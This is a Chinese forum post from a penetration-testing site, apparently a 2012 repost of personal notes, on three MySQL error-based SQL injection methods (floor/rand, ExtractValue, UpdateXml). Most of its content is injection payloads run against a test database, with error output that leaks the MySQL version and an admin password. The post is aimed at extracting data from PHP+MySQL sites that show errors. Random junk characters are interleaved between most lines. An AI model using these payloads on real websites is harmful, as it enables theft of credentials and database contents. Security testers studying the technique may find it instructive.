中国网络渗透测试联盟
标题:
关于Mysql注入过程中的三种报错方式
[打印本页]
作者:
admin
时间:
2012-12-10 10:28
标题:
关于Mysql注入过程中的三种报错方式
放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
& s7 s" E1 |: K% p
实际测试环境:
3 h, _/ ^: g+ x2 R
# D, j# R9 c' Y% R4 _
4 x& A$ i0 k4 W; y8 T2 D; M
mysql> show tables;
% `0 |( g( O. M* e/ r* C
+----------------+
+ d6 I6 c. @6 y4 E; m, _1 }4 @$ M
| Tables_in_test |
: V, k$ {2 h3 C& M2 ~2 H. p
+----------------+
4 @* F2 v9 s, N
| admin |
# g) y- l' F6 z* J1 K; U- R- Q
| article |
( V. @% R8 w) [
+----------------+
# r1 \. ?$ J! i+ c8 W( h) Q2 Q8 i0 ~
V, q/ n) n; o! i. c$ W
6 r$ ~- S! J4 f; z( n- T- P
% J8 k7 h6 r; ]( S8 _
mysql> describe admin;
l7 P% e# N2 H/ [
+-------+------------------+------+-----+---------+----------------+
) W6 z: L1 A7 F& B- K v" f+ m
| Field | Type | Null | Key | Default | Extra |
" A. v% t3 z/ G& `# n% B D$ v
+-------+------------------+------+-----+---------+----------------+
9 Y0 J, H' E4 K3 N
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
w( w! s( i: }- c" e- T% M
| user | varchar(50) | NO | | NULL | |
7 A a/ E5 o# ]
| pass | varchar(50) | NO | | NULL | |
/ A) I6 m8 Y k. ~, F" D
+-------+------------------+------+-----+---------+----------------+
; c) O, W' i# E6 P3 W
4 B* q- `$ n: c2 |
/ i9 p6 q8 s5 ?& v; i. H) o
, ?" ~* y1 X' t2 N- u6 O* U& I9 Q }
mysql> describe article;
$ S1 Q5 e1 Q* C- M
+---------+------------------+------+-----+---------+----------------+
" T" e: B, x4 H q' e
| Field | Type | Null | Key | Default | Extra |
) ?7 s! \$ M7 m+ h4 {
+---------+------------------+------+-----+---------+----------------+
- p" d3 x# u( U/ I6 V' H7 n
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
3 n; ~% R. B5 k
| title | varchar(50) | NO | | NULL | |
; _$ a9 z I; O7 Y4 [
| content | varchar(50) | NO | | NULL | |
' e. J8 N& K6 p3 Z. {
+---------+------------------+------+-----+---------+----------------+
$ t/ z- `/ i5 j/ c# |. t7 I
1、通过floor报错
q P5 a) ^8 e; M& b6 I1 q
可以通过如下一些利用代码
: P; h' Q) W8 E' H2 y
/ i" t2 g7 a) c- D6 P
8 N* _4 u$ P* C, a, w2 s" h% c; a& K# f
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
' i) j0 y+ x% W: O8 t
from information_schema.tables group by x)a);
" d& {* G3 P5 f; [, F
$ q; X% s0 X0 G/ E C1 s5 X2 Y
$ `2 p! S. E/ A2 `2 f% |. i
and (select count(*) from (select 1 union select null union select !1)x
" P. Q6 U+ q3 ~9 h% I
group by concat((select table_name from information_schema.tables limit 1),
) H9 K r* r8 C) N- o. a
floor(rand(0)*2)));
/ d* w" y; A- L
举例如下:
3 h5 n) N G* x
首先进行正常查询:
# @7 B5 l! A4 W* f+ Q! q q
" D6 [8 F* V0 [4 B
mysql> select * from article where id = 1;
+ ?. _ O4 B( a9 p- W* Y6 N
+----+-------+---------+
; J& p5 r1 d7 q# }0 T& @
| id | title | content |
q) [* y4 E: b, H9 `& F5 E
+----+-------+---------+
$ r& A' z3 j# h" A1 V4 q- |7 \* A. H% s
| 1 | test | do it |
3 g! v4 r* l) Q; G# t% M
+----+-------+---------+
/ A: |8 M* o) G6 J/ _# @) w5 x
假如id输入存在注入的话,可以通过如下语句进行报错。
3 K7 @$ T- R3 t( ]
% ~7 P1 j p5 C% l4 k- U0 Z
% y# A8 N( q" J, F- r3 W
mysql> select * from article where id = 1 and (select 1 from
0 ~2 B0 p- a P$ K4 \5 H
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
* g/ O9 R" y, l
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
( Q v; V! h" l9 J0 o
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
8 y6 C3 Y$ E% H$ E$ G! m: E
例如我们需要查询管理员用户名和密码:
, u+ ]! c! u& m
Method1:
9 J0 h: W/ x- w
+ N# ?4 }2 w# h7 D
* B7 G9 t# x! A9 O/ C
mysql> select * from article where id = 1 and (select 1 from
- q4 N1 a" P8 A/ L7 f8 _
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
! c# Q- Z3 \9 b2 ?/ X
from information_schema.tables group by x)a);
* B2 O' G( K" k0 S" y
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
6 h/ h$ F" r$ ]7 Z
Method2:
7 ~2 {0 z/ Q/ p/ h0 Q
& S0 y# T5 O4 I+ i
! n' J4 E$ g4 v
mysql> select * from article where id = 1 and (select count(*)
2 E! v9 t5 z& v1 r8 O9 ^" `' ^& E( M
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
8 z5 f; q. h$ w$ l" h7 T+ p
floor(rand(0)*2)));
& N3 d- L# T' s4 t
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
3 ^" Q& K5 v! A2 J) T) G
2、ExtractValue
0 M! | q4 u. O! _
测试语句如下
/ Y, M( p) g2 p5 l$ e9 Y3 T
, `2 h' E& x0 D
( \% p( I$ q* y; L+ U5 A
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
6 }0 _' V* _3 p4 p
实际测试过程
\$ i3 r2 D- D3 V! f* H7 E4 C) w
, V! S' g+ }7 A& ~: |
: Y- c0 Z$ _+ {- f* ^3 B5 F7 n7 h
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
/ C1 g) Q% x* S U& c% y
(select pass from admin limit 1)));--
! t2 T* o+ @ w+ E3 |
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
' L2 b/ Z/ d. P2 \
3、UpdateXml
' }) f5 B7 l0 B- ?! v0 w5 F4 t
测试语句
$ H7 n: m' a# I
0 u* E$ o) [9 n9 }' M! h l1 B5 q
9 K- E# w9 \- z7 a
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
/ r9 D; N1 H& Z1 v$ i
实际测试过程
( k% n! @, s- T% R8 R9 ?
, y' I( k8 T3 d2 |& k9 o
& Q* o& H5 @1 Y+ g3 P- T! D
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
, p* Z0 ]: y- _% E6 y& C: l
(select pass from admin limit 1),0x5e24),1));
7 k) [) H% K/ }( J' W, d
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
: ?5 `! n% S/ G+ d$ c
All, thanks foreign guys.
% H( E2 g* e1 I! K2 }
4 {9 j7 O3 ~0 m7 t+ q. R* i. O& c
1 k& S' U; z2 T
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2